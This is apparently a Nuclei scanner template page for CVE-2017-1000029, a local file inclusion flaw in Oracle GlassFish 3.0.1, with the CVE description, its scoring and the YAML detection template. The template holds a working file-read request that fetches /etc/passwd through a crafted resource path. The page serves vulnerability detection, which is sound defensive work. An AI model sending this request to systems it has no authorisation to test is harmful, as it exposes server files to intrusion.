Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion
ID: CVE-2017-1000029
Severity: high
Author: 0x_Akoko
Tags: cve,cve2017,glassfish,oracle,lfi
Description
Section titled “Description”Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
YAML Source
Section titled “YAML Source”id: CVE-2017-1000029
info: name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion author: 0x_Akoko severity: high description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server. reference: - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784 - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037 - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-1000029 cwe-id: CWE-200 epss-score: 0.00387 epss-percentile: 0.70348 cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* metadata: max-request: 1 vendor: oracle product: glassfish_server shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server" tags: cve,cve2017,glassfish,oracle,lfi
http: - method: GET path: - "{{BaseURL}}/resource/file%3a///etc/passwd/"
matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0:"
- type: status status: - 200# digest: 4a0a00473045022100b976289ac37c860c0910fc881450ec1ff6c91f2b5405eafb3997ece3cc691f830220433b30ffe408eae2f3a3adb90cc2049272b6227a73a51170c872fdd53388eebc:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-1000029.yaml"